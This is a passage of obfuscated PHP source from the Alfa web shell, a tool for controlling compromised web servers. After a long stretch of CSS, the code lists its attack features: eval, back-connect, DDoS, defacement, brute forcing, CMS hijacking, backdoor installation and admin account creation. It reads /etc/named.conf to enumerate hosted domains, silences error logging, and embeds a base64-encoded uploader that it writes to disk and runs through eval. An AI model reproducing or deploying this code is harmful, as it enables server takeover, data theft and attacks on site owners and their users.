\xa	overflow: hidden;\xd
    text-overflow: ellipsis;\xd
    white-space: nowrap;\xd\xa}\xd
.editor-icon {\xd\xa	position: absolute;
}\xd
.is_active {
	background: rgba(49, 55, 93, 0.77);\xd
\x9border-radius: 10px;
}\xd\xa.history-list {\xd
\x9height: 88%;
	overflow-y: auto;\xd\xa}\xd
#editor-minimized,#cgiloader-minimized {\xd\xa	display: block;\xd
\x9position: fixed;
\x9right: -30px;\xd\xa\x9width: 30px;
	height: 30px;
\xa\x9top: 30%;\xd\xa}\xd
.minimized-wrapper {\xd
\x9position: relative;
\xa	background: rgb(14, 48, 74);\xd\xa    width: 44px;
    height: 167px;\xd\xa\x9cursor: pointer;
	border-bottom-left-radius: 5px;
	border-top-left-radius: 5px;
}\xd
.minimized-text {
    transform: rotate(-90deg);
\xa    color: wheat;
    font-size: x-large;\xd
    display: inline-block;\xd
    position: absolute;
\xa    right: -51px;
\xa    width: 129px;
\xa    top: 50px;\xd\xa    border-top-left-radius: 4%;\xd\xa    height: 56px;
\xa    padding: 3px
\xa}\xd
.close-button,.editor-minimize {
\xa\x9height: 26px;
    width: 38px;\xd
    right: 7px;
    background: rgb(29, 86, 115);
    cursor: pointer;
\xa    position: absolute;\xd
    box-sizing: border-box;
\xa    line-height: 50px;\xd
    display: inline-block;\xd
    top: 17px;
\xa    border-radius: 100px;
}\xd\xa.editor-minimize {right: 50px;}
\xa.close-button:before,.close-button:after,.editor-minimize:before {\xd
\x9transform: rotate(-45deg);\xd\xa    content: "";\xd
    position: absolute;\xd
    top: 63%;\xd
    right: 6px;\xd\xa    margin-top: -5px;
\xa    margin-left: -25px;
\xa    display: block;\xd\xa    height: 4px;\xd\xa    width: 27px;\xd\xa    background-color: rgba(216, 207, 207, 0.75);\xd\xa    transition: all 0.25s ease-out;\xd\xa}\xd
.editor-minimize:before{
	transform: rotate(0deg);
\xa}\xd
.close-button:after {
  transform: rotate(-135deg);
}
.close-button:hover:before,.close-button:hover:after,.editor-minimize:hover:before{\xd
	background-color: red;\xd\xa}\xd
.close-button:hover,.editor-minimize:hover{\xd
	background-color: rgba(39, 66, 80, 0.96);\xd\xa}
#editor,#cgiloader {\xd
\x9display: none;
\xa\x9position: fixed;
    top: 0;\xd\xa\x9width: 100%;\xd
\x9height: 100%;
\xa}
\xa.editor-wrapper {\xd
	width: 100%;
    height: 100%;
    position: relative;\xd
    top: 1%;\xd\xa}\xd
.editor-header {
\xa\x9width: 97%;\xd\xa    background: rgba(21, 66, 88, 0.93);\xd\xa    height: 37px;\xd\xa    margin-left: 13px;\xd\xa    position: relative;\xd
	border-top-left-radius: 15px;\xd\xa	border-top-right-radius: 15px;
}\xd\xa.editor-path {\xd\xa\x9position: absolute;\xd
    font-size: x-large;
\xa    margin-left: 10px;\xd
    top: 6px;
    color: springgreen;
}
.editor-modal {\xd
    position: relative;\xd
    top: 0;\xd\xa    background-color: rgba(0, 1, 23, 0.95);\xd
    height: 90%;\xd\xa    margin-left: 20%;
\xa    margin-right: 2%;
    border: 2px #0e304a solid;
}
\xa.editor-explorer {\xd\xa    width: 19%;\xd
    height: 90%;\xd
    background-color: rgba(0, 1, 23, 0.94);
    position: absolute;
\xa    z-index: 2;
\xa    left: 1%;
\xa    border: 2px rgb(14, 48, 74) solid;
\xa}
.editor-controller {
	position: relative;\xd\xa\x9top: -13px;\xd
}\xd\xa.file-holder {
\x9position: relative;
\xa    width: 100%;\xd\xa    height: 30px;\xd\xa}
.file-holder > .history {\xd
	position: absolute;\xd
    color: rgb(3, 179, 163);
    cursor: pointer;
\x9left:5px;
\xa    font-size: 18px;\xd\xa    font-family: sans-serif;\xd
	width:89%;
	height:100%;
	z-index: 3;
\x9border-radius: 10px;\xd
	transition: background-color 600ms ease-out;\xd\xa}\xd\xa.file-holder > .history-close {\xd\xa	display: block;\xd\xa    opacity: 0;\xd
    position: absolute;\xd\xa    right: 2px;
    width: 20px;\xd
    top: 4px;
    text-align: center;
    cursor: pointer;\xd\xa    color: white;\xd\xa    background: red;\xd\xa    border-radius: 100px;\xd\xa    font-family: monospace;
    z-index: 10;\xd\xa    transition: opacity 600ms ease-out;\xd
    font-size: 15px;\xd
    height: 19px;\xd
}\xd
.file-holder > .history:hover {
\xa\x9background-color: #646464;
}
.editor-explorer > .hheader {
\xa\x9position: relative;\xd
    color: rgb(20, 255, 7);\xd
    border-bottom: 2px rgb(32, 106, 162) solid;
\xa    text-align: center;\xd\xa    font-family: sans-serif;\xd
    margin-bottom: 10px;
\x9height: 55px;\xd\xa}\xd\xa.editor-search {\xd\xa\x9position: absolute;\xd\xa    bottom: 7px;\xd
    left: 31px;
\xa}
.hheader-text {\xd
\x9position: absolute;
    left: 8px;\xd\xa    top: 2px;
}
.history-clear {
\xa	position: absolute;
    right: 8px;\xd\xa    top: 2px;\xd\xa    cursor: pointer;
}\xd
.editor-body {
\x9position: relative;
	margin-left: 3px;
\xa}\xd\xa.editor-anim-close {
\xa	" . showAnimation("editorClose") . "\xd\xa}
\xa@keyframes editorClose {\xd\xa	0% {
\x9	transform: scale(1);\xd\xa\x9\x9opacity: 1;\xd\xa	}\xd
	100% {\xd
\x9\x9transform: scale(0);
\xa\x9\x9opacity: 0;\xd\xa\x9}\xd
}
\xa.editor-anim-minimize {
	" . showAnimation("editorMinimize") . "
\xa}
@keyframes editorMinimize {\xd
	0% {
\xa\x9	right:0px;\xd
\x9	opacity: 1;\xd\xa\x9}\xd\xa	100% {\xd
		right: -2000px;\xd
\x9\x9opacity: 0;
	}\xd
}\xd\xa.editor-anim-show {
\x9" . showAnimation("editorShow") . "
}
\xa@keyframes editorShow {
\xa	0% {
		right:-2000px;\xd
		opacity: 0;
	}
\xa	100% {
	\x9right: 0px;
\x9	opacity: 1;\xd\xa	}\xd
}
\xa.minimized-show {\xd
\x9" . showAnimation("minimizeShow") . "
}
\xa@keyframes minimizeShow {\xd
\x90% {
\x9	right: -30px;\xd
\x9\x9opacity: 0;\xd\xa	}
\x9100% {
		right: 0px;\xd
	\x9opacity: 1;
\xa	}
}
\xa.minimized-hide {
\xa	" . showAnimation("minimizeHide") . "
\xa}\xd\xa@keyframes minimizeHide {\xd\xa\x90% {\xd
		right: 0px;\xd\xa\x9\x9opacity: 1;
\xa\x9}
	100% {\xd\xa\x9	right: -30px;
\x9\x9opacity: 0;
\xa	}\xd\xa}
\xa.solevisible-text:hover {
\xa	-webkit-text-shadow: 0px 0px 25px #00FF00;\xd
\x9-moz-text-shadow: 0px 0px 25px #00FF00;
	-ms-text-shadow: 0px 0px 25px #00FF00;
\x9text-shadow: 0px 0px 25px #00FF00;
}\xd\xa.update-holder {\xd
    position: fixed;\xd\xa    top: 0;\xd
    background-color: rgba(0, 24, 29, 0.72);\xd
    width: 100%;\xd
    height: 100%;
\xa}\xd\xa.update-partner {
    width: 50%;
\xa    position: relative;
    border-radius: 31px;
\xa    height: 200px;
\xa    background-color: rgba(3, 3, 41, 0.47);
    text-align: center;\xd
    color: rgba(252, 253, 251, 0.88);
    margin-left: 25%;
\xa    top: 23%;
\xa    font-family: "Francois One", sans-serif;\xd
}
\xa.update-partner:hover {
-webkit-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);\xd
-moz-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
\xabox-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
\xa}\xd
.update-content {
\xa	position: relative;\xd\xa}\xd
.update-content > a {
\xa    text-decoration: none;
    position: absolute;
\xa    color: rgba(103, 167, 47, 0.77);
\xa    left: 24%;\xd
    margin-top: 7%;\xd
    font-size: 40px;
    font-family: "Francois One", sans-serif;\xd\xa}
.update-close {\xd\xa\x9position: absolute;\xd\xa    right: 0;\xd\xa    margin-right: 23px;\xd
    top: 10px;
\xa    font-size: 27px;\xd\xa    background-color: #130f50;\xd
    width: 5%;\xd
    border-radius: 100px;\xd
    cursor: pointer;\xd\xa    border: 2px rgb(14, 38, 90) solid;
}\xd
.update-close:hover {
\xa	border: 2px #25ff00 solid;\xd
    color: #FF0000;\xd
}\xd\xa.filestools {\xd\xa    height: auto;
\xa    width: auto;\xd\xa    color: #67ABDF;\xd\xa    font-size: 12px;\xd\xa    font-family: Verdana,Geneva,sans-serif;
}
\xa@-moz-document url-prefix() {\xd\xa\x9#search-input {
\xa		width: 173px;
	}\xd\xa\x9.editor-path {
\x9\x9top:3px;
\xa	}
\xa}\xd
@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}\xd\xa@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}\xd
@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}
\xa@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}
\xa#alfaloader{" . $csscode . "width:100px;height:100px;}
\xa#a_loader{" . $csscode . "width:150px;height:150px;position:fixed;z-index:999999;top: 42%;left: 45%;display:none;}
.ajaxarea{border:1px solid #0E304A;color:#67ABDF}#up_bar{background-color:red;width:0;height:2px;display:none;position:fixed;z-index:100000}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:" . alfa_getColor("header_values") . ";font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url(" . __showicon("alfamini") . ");background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:" . ($GLOBALS["DB_NAME"]["show_icons"] == "1" ? "0" : "1") . "px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url(" . __showicon("alfamini") . ");background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;border:1px solid #0F0;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url(" . __showicon("btn") . ");background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
.foottable{width: 300px;font-weight: bold;" . (!@is_writable($GLOBALS["cwd"]) ? "}.dir{background-color:red;}" : "}") . "
\xa.main th{text-align:left;}\xd\xa.main a{color: #FFF;}\xd\xa.main tr:hover{background-color:#646464;}\xd
.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:99%; height:300px; }
\xa" . alfaCssLoadColors() . "
</style>"; goto sDrFU; znKUY: if (function_exists("mssql_connect")) { $mssql = $on; } else { $mssql = $of; } goto m83aA; HamDr: $li = array("FilesMan" => "Home", "proc" => "Process", "phpeval" => "Eval", "sql" => "SQL Manager", "dumper" => "Mysql Dumper", "hash" => "En-Decoder", "connect" => "BC", "ssh2" => "SSH2", "zoneh" => "ZONE-H", "dos" => "DDOS", "safe" => "ByPasser", "cgishell" => "Cgi Shell", "ssiShell" => "SSI SHELL", "cpcrack" => "Hash Tools", "portscanner" => "Port Scaner", "basedir" => "Open BaseDir", "mail" => "Fake Mail", "ziper" => "Compressor", "IndexChanger" => "Index Changer", "pwchanger" => "Add New Admin", "ShellInjectors" => "Shell Injectors", "php2xml" => "PHP2XML", "cloudflare" => "CloudFlare", "Whmcs" => "Whmcs DeCoder", "symlink" => "Symlink", "MassDefacer" => "Mass Defacer", "Crackers" => "BruteForcer", "searcher" => "Searcher", "cmshijacker" => "CMS Hijacker", "remotedl" => "Remote Upload", "inbackdoor" => "Install BackDoor", "whois" => "Whois", "settings" => "Alfa Settings", "plus" => "<span class="alfa_plus">Alfa +</font>", "selfrm" => "Remove Shell"); goto dJlzH; Oltzl: function Alfa_GetDisable_Function() { goto AnNPv; lB1mQ: if ($i == 0) { return $afa; } goto iQhvF; avmsp: $func = array("system", "exec", "shell_exec", "proc_open", "popen", "passthru", "symlink", "dl"); goto aL8f5; RlBJO: $b = 0; goto avmsp; oqu1K: $afa = "<span class="header_show_all">All Functions Accessible</span>"; goto X2bEB; AnNPv: $disfun = @ini_get("disable_functions"); goto oqu1K; NhXD4: $s = explode(",", $disfun); goto PAGls; wAqqa: $allow_list = array(); goto XV98x; PAGls: $s = array_unique($s); goto M0OWD; iQhvF: if ($i <= count($func)) { $all = array_values(array_merge($black_list, $allow_list)); return "<span class="disable_functions">" . implode(" | ", $all) . "</span>"; } goto yK927; M0OWD: $i = 0; goto RlBJO; yK927: return "<span class="disable_functions">" . $dis . "</span><a href=javascript:void(0) onclick="g('GetDisFunc',null,'wp');"><span class="header_show_all">Show All (" . $i . ")</span></a>"; goto xBOIn; aL8f5: $black_list = array(); goto wAqqa; X2bEB: if (empty($disfun)) { return $afa; } goto NhXD4; XV98x: foreach ($s as $d) { goto OH8mr; OH8mr: $d = trim($d); goto NUIo4; NUIo4: if (empty($d) || !is_callable($d)) { continue; } goto ZvoNj; ZvoNj: if (!function_exists($d)) { if (in_array($d, $func)) { goto qjn8v; VpgX_: $black_list[] = $d; goto bDuwt; DEbae: $b++; goto VpgX_; qjn8v: $dis .= $d . " | "; goto DEbae; bDuwt: } else { $allow_list[] = $d; } $i++; } goto ivFUN; ivFUN: } goto lB1mQ; xBOIn: } goto GMvg4; DaQxq: if ($GLOBALS["sys"] == "unix") { $d0mains = _alfa_file("/etc/named.conf", false); if (!$d0mains) { echo "Cant Read [ /etc/named.conf ]"; $GLOBALS["need_to_update_header"] = "true"; } else { goto bgVKx; H5tyo: foreach ($d0mains as $d0main) { if (@strstr($d0main, "zone")) { goto T3Rd2; dGWEk: if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } goto KEI08; T3Rd2: preg_match_all("#zone "(.*)"#", $d0main, $domains); goto UCG9G; UCG9G: flush(); goto dGWEk; KEI08: } } goto eewMH; eewMH: echo "{$count} Domains"; goto cuiqv; bgVKx: $count = 0; goto H5tyo; cuiqv: } } else { echo "Cant Read [ /etc/named.conf ]"; } goto TvOfA; W3i4l: echo "
\xaif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}"; goto luJsI; VuLpz: if (!function_exists("posix_getegid")) { goto mqdRw; LE2Gf: $gid = function_exists("getmygid") ? @getmygid() : "????"; goto AwzNt; AwzNt: $group = "?"; goto vXe19; mqdRw: $user = function_exists("get_current_user") ? @get_current_user() : "????"; goto tl7c2; tl7c2: $uid = function_exists("getmyuid") ? @getmyuid() : "????"; goto LE2Gf; vXe19: } else { goto vHWS7; ZW3Ai: $uid = $uid["uid"]; goto S6R2c; S6R2c: $group = $gid["name"]; goto rySVI; vHWS7: $uid = function_exists("posix_getpwuid") && function_exists("posix_geteuid") ? @posix_getpwuid(posix_geteuid()) : array("name" => "????", "uid" => "????"); goto rAe96; lUTmq: $user = $uid["name"]; goto ZW3Ai; rAe96: $gid = function_exists("posix_getgrgid") && function_exists("posix_getegid") ? @posix_getgrgid(posix_getegid()) : array("name" => "????", "gid" => "????"); goto lUTmq; rySVI: $gid = $gid["gid"]; goto INbvC; INbvC: } goto Wb3B7; h9PUa: if (function_exists("mysql_get_client_info")) { $mysql = $on; } else { $mysql = $of; } goto znKUY; CdcgF: for ($s = 1; $s <= 10; $s++) { echo "<input type="hidden" name="alfa" . $s . "">"; } goto NvI0j; vOZKY: echo "<tr>
<td height="12"><span class="header_vars">PWD:</span></td>\xd\xa<td colspan="2"><span id="header_cwd">" . $cwd_links . " </span><a href="javascript:void(0);" onclick="g('FilesMan','" . $GLOBALS["home_cwd"] . "','','','')"><span class="home_shell">[ Home Shell ]</span> </a><a href="javascript:void(0);" onclick="path_history('back');"><span class="back_shell">[ BACK ]</span></a></td>\xd\xa</tr>\xd\xa</table>\xd\xa</div>\xd
<div id="meunlist">
\xa<ul>\xd\xa"; goto HamDr; PLcw7: if (@ini_get("disable_functions")) { $disfun = @ini_get("disable_functions"); } else { $disfun = "All Functions Enable"; } goto byoId; tpERq: if ($quotes == "1" or $quotes == "on") { $magic = "<b><span class="header_on">ON</span>"; } else { $magic = "<span class="header_off">OFF</span>"; } goto mRIkb; GMvg4: function AlfaNum() { goto F2k1K; p1f3u: foreach ($args as $arg) { $find[] = $arg; } goto u9ttp; AMjfT: echo """</script>"; goto v32BG; cNOMT: foreach ($alfax as $alfa) { if (in_array($alfa, $find)) { continue; } echo "alfa" . $alfa . "_="; } goto AMjfT; kOWEy: $alfax = array(); goto fpTKq; u9ttp: echo "<script>"; goto cNOMT; FLA7D: for ($i = 1; $i <= 10; $i++) { $alfax[] = $i; } goto p1f3u; fpTKq: $find = array(); goto FLA7D; F2k1K: $args = func_get_args(); goto kOWEy; v32BG: } goto ndQrV; myvs3: if ($uname == "( php_uname ) Function Disabled !") { $GLOBALS["need_to_update_header"] = "true"; } goto LwZe2; mIR_1: if (!empty($_SESSION["AlfaUser"]) && !empty($_SESSION["AlfaPass"])) { echo "<li><a href="javascript:void(0);" onclick="g('logout',null,'','','');setTimeout(function(){location.reload();},2000);"><font color="red">LogOut</font></a></li></ul></div>"; } else { echo "</ul></div>"; } goto Io4Uf; uYDwA: if ($GLOBALS["sys"] == "win") { echo "<tr>\xd\xa<td height="12"><span class="header_vars">DRIVE:</span></td>
\xa<td colspan="2"><b>" . $drives . "</b></td>\xd\xa</tr>"; } goto vOZKY; Io4Uf: } else { goto wg5BI; wg5BI: @error_reporting(E_ALL ^ E_NOTICE); goto PYPQi; r1xf_: @ini_set("max_execution_time", 0); goto N1sx1; ykpaf: @set_time_limit(0); goto ZtITI; N1sx1: @ini_set("magic_quotes_runtime", 0); goto ykpaf; PIv0O: @ini_set("log_errors", 0); goto r1xf_; PYPQi: @ini_set("error_log", NULL); goto PIv0O; ZtITI: } goto VH_PD; AUYBh: if (!function_exists("sys_get_temp_dir")) { function sys_get_temp_dir() { goto szD9d; szD9d: foreach (array("TMP", "TEMP", "TMPDIR") as $env_var) { if ($temp = getenv($env_var)) { return $temp; } } goto Rvt0O; ezgtG: if (_alfa_file_exists($temp, false)) { unlink($temp); return dirname($temp); } goto CQVQ3; CQVQ3: return null; goto HJbDg; Rvt0O: $temp = tempnam($GLOBALS["__file_path"], ''); goto ezgtG; HJbDg: } } goto Rs1te; Zgn_2: $alfa_uploader = "$x = base64_decode("" . $GLOBALS["__ALFA_SHELL_CODE"] . "");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);"; goto jw7us; Rs1te: $GLOBALS["__ALFA_SHELL_CODE"] = "PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+"; goto Zgn_2; jw7us: define("ALFA_UPLOADER", "eval(base64_decode('" . __ZW5jb2Rlcg($alfa_uploader) . "'))"); goto tubBk; VH_PD: } goto JWRSz; DQTnU: function alfacheckfiletype() { goto OOajX; Ie0yn: $arg = $_POST["arg"]; goto d4jJr; d4jJr: if (@is_file($path . "/" . $arg)) { echo "file"; } else { echo "dir"; } goto eeFCS; OOajX: $path = $_POST["path"]; goto Ie0yn; eeFCS: } goto zLeDO; G7kow: $GLOBALS["__ALFA_COLOR__"] = array("shell_border" => array("key_color" => "#0E304A", "multi_selector" => array(".header" => "border: 7px solid {color}", "#meunlist" => "border-color: {color}", "#hidden_sh" => "background-color: {color}", ".ajaxarea" => "border: 1px solid {color}", ".foot" => "border-color: {color}")), "header_vars" => "#27979B", "header_values" => "#67ABDF", "header_on" => "#00FF00", "header_off" => "#ff0000", "header_none" => "#00FF00", "home_shell" => "#ff0000", "home_shell:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".home_shell:hover" => "color: {color};")), "back_shell" => "#efbe73", "back_shell:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".back_shell:hover" => "color: {color};")), "header_pwd" => "#00FF00", "header_pwd:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".header_pwd:hover" => "color: {color};")), "header_drive" => "#00FF00", "header_drive:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".header_drive:hover" => "color: {color};")), "header_show_all" => "#00FF00", "disable_functions" => "#ff0000", "footer_text" => "#27979B", "menu_options" => "#27979B", "menu_options:hover" => array("key_color" => "#646464", "multi_selector" => array(".menu_options:hover" => "background-color: {color};font-weight: unset;")), "options_list" => array("key_color" => "#00FF00", "multi_selector" => array(".ajaxarea .header center a" => "color: {color};")), "options_list:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".ajaxarea .header center a:hover" => "color: {color};")), "options_list_header" => array("key_color" => "#59cc33", "multi_selector" => array(".txtfont_header" => "color: {color};")), "options_list_text" => array("key_color" => "#FFFFFF", "multi_selector" => array(".txtfont,.tbltxt" => "color: {color};")), "Alfa+" => array("key_color" => "#27E8AE", "multi_selector" => array(".alfa_plus" => "color: {color};font-weight: unset;")), "hidden_shell_text" => array("key_color" => "#00FF00", "multi_selector" => array("#hidden_sh a" => "color: {color};")), "hidden_shell_version" => "#ff0000", "shell_name" => "#FF0000", "main_row:hover" => array("key_color" => "#646464", "multi_selector" => array(".main tr:hover" => "background-color: {color};")), "main_header" => array("key_color" => "#FFFFFF", "multi_selector" => array(".main th" => "color: {color};")), "main_name" => array("key_color" => "#FFFFFF", "multi_selector" => array(".main .main_name" => "color: {color};font-weight: unset;")), "main_size" => "#67ABDF", "main_modify" => "#67ABDF", "main_owner_group" => "#67ABDF", "main_green_perm" => "#25ff00", "main_red_perm" => "#FF0000", "main_white_perm" => "#FFFFFF", 